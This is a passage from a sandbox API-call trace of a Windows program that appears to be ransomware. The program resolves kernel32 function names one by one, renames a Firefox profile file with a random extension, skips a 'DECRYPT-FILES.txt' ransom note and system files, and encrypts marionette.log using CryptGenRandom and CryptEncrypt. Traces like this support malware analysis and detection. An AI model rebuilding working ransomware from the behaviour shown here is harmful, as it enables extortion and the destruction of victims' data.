returned="DebugActiveProcess" [0081.443] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0081.443] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0081.443] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0081.443] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0081.443] lstrlenA (lpString="DEBUGBREAK") returned 10 [0081.443] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0081.443] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0081.444] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0081.444] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0081.444] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0081.444] lstrlenA (lpString="DECODEPOINTER") returned 13 [0081.444] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0081.444] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0081.444] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0081.444] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0081.444] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0081.445] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0081.445] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0081.445] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0081.446] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0081.446] lstrlenA (lpString="DELETEATOM") returned 10 [0081.446] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0081.446] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0081.446] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0081.446] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0081.446] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0081.446] lstrlenA (lpString="DELETEFIBER") returned 11 [0081.446] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0081.446] lstrlenA (lpString="DELETEFILEA") returned 11 [0081.446] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0081.446] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0081.446] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0081.446] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0081.446] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0081.446] lstrlenA (lpString="DELETEFILEW") returned 11 [0081.446] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0081.446] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0081.446] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0081.446] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0081.446] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0081.446] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0081.446] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0081.446] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0081.446] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0081.446] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0081.446] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0081.446] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0081.446] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0081.446] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0081.446] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0081.446] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0081.446] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0081.446] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0081.446] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0081.446] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0081.447] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0081.447] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0081.447] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0081.447] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0081.447] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0081.447] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0081.447] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0081.447] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0081.447] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0081.447] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0081.447] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0081.447] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0081.447] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0081.447] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0081.447] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0081.447] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0081.447] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0081.447] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0081.447] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0081.447] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0081.447] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0081.447] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0081.447] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0081.447] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0081.447] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0081.447] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0081.447] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0081.447] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0081.447] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0081.447] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0081.447] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0081.447] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0081.447] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0081.447] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0081.447] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0081.447] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0081.447] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0081.448] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0081.448] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0081.448] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0081.448] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0081.448] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0081.448] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0081.448] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0081.448] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0081.448] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0081.448] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0081.448] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0081.448] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\localstore.rdf") returned 102 [0081.448] wsprintfW (in: param_1=0x3f2d4b4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\localstore.rdf.B0Mw") returned 107 [0081.448] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\localstore.rdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\localstore.rdf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\localstore.rdf.B0Mw" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\localstore.rdf.b0mw"), dwFlags=0x0) returned 1 [0081.449] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.449] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.449] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.449] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb6518ad0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb6518ad0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x85572e90, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x39, dwReserved0=0x0, dwReserved1=0x0, cFileName="marionette.log", cAlternateFileName="MARION~1.LOG")) returned 1 [0081.449] lstrcmpiW (lpString1="marionette.log", lpString2="DECRYPT-FILES.txt") returned 1 [0081.449] lstrcmpiW (lpString1="marionette.log", lpString2="autorun.inf") returned 1 [0081.449] lstrcmpiW (lpString1="marionette.log", lpString2="boot.ini") returned 1 [0081.449] lstrcmpiW (lpString1="marionette.log", lpString2="desktop.ini") returned 1 [0081.450] lstrcmpiW (lpString1="marionette.log", lpString2="ntuser.dat") returned -1 [0081.450] lstrcmpiW (lpString1="marionette.log", lpString2="iconcache.db") returned 1 [0081.450] lstrcmpiW (lpString1="marionette.log", lpString2="bootsect.bak") returned 1 [0081.450] lstrcmpiW (lpString1="marionette.log", lpString2="ntuser.dat.log") returned -1 [0081.450] lstrcmpiW (lpString1="marionette.log", lpString2="thumbs.db") returned -1 [0081.450] lstrcmpiW (lpString1="marionette.log", lpString2="Bootfont.bin") returned 1 [0081.450] lstrlenW (lpString="marionette.log") returned 14 [0081.450] lstrcmpiW (lpString1="log", lpString2="lnk") returned 1 [0081.450] lstrcmpiW (lpString1="log", lpString2="exe") returned 1 [0081.450] lstrcmpiW (lpString1="log", lpString2="sys") returned -1 [0081.450] lstrcmpiW (lpString1="log", lpString2="dll") returned 1 [0081.450] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0081.450] lstrlenW (lpString="marionette.log") returned 14 [0081.450] lstrcpyW (in: lpString1=0x3f2dcb4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0081.450] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="marionette.log" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\marionette.log") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\marionette.log" [0081.450] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0081.450] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\marionette.log" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\marionette.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x460 [0081.451] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x3f2d480 | out: lpFileSize=0x3f2d480*=57) returned 1 [0081.451] CreateFileMappingW (hFile=0x460, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x464 [0081.451] MapViewOfFile (hFileMappingObject=0x464, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0081.451] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0081.451] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0081.451] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0081.454] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x100) returned 1 [0081.454] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0081.455] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.455] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0081.455] CloseHandle (hObject=0x464) returned 1 [0081.455] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.455] WriteFile (in: hFile=0x460, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d408, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2d408*=0x108, lpOverlapped=0x0) returned 1 [0081.456] CloseHandle (hObject=0x0) returned 0 [0081.456] CloseHandle (hObject=0x460) returned 1 [0081.456] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.457] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.457] GetTickCount () returned 0x114cd7d [0081.457] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0081.457] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0081.457] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0081.457] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0081.458] lstrlenA (lpString="kernel32.dll") returned 12 [0081.458] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0081.458] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0081.458] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0081.458] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0081.458] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0081.458] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0081.458] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0081.458] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0081.458] lstrlenA (lpString="ADDATOMA") returned 8 [0081.458] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0081.458] lstrlenA (lpString="ADDATOMW") returned 8 [0081.458] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0081.458] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0081.458] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0081.458] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0081.458] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0081.458] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0081.458] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0081.458] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0081.458] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0081.458] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0081.458] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0081.458] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0081.458] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0081.458] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0081.458] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0081.459] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0081.459] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0081.459] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0081.459] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0081.459] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0081.459] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0081.459] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0081.459] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0081.459] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0081.459] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0081.459] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0081.459] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0081.459] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0081.459] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0081.459] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0081.459] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0081.459] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0081.459] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0081.459] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0081.459] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0081.459] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0081.459] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0081.459] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0081.459] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0081.459] lstrlenA (lpString="BACKUPREAD") returned 10 [0081.459] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0081.459] lstrlenA (lpString="BACKUPSEEK") returned 10 [0081.459] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0081.459] lstrlenA (lpString="BACKUPWRITE") returned 11 [0081.459] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0081.460] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0081.460] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0081.460] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0081.460] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0081.460] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0081.460] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0081.460] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0081.460] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0081.460] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0081.460] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0081.460] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0081.460] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0081.460] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0081.460] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0081.460] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0081.460] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0081.460] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0081.460] 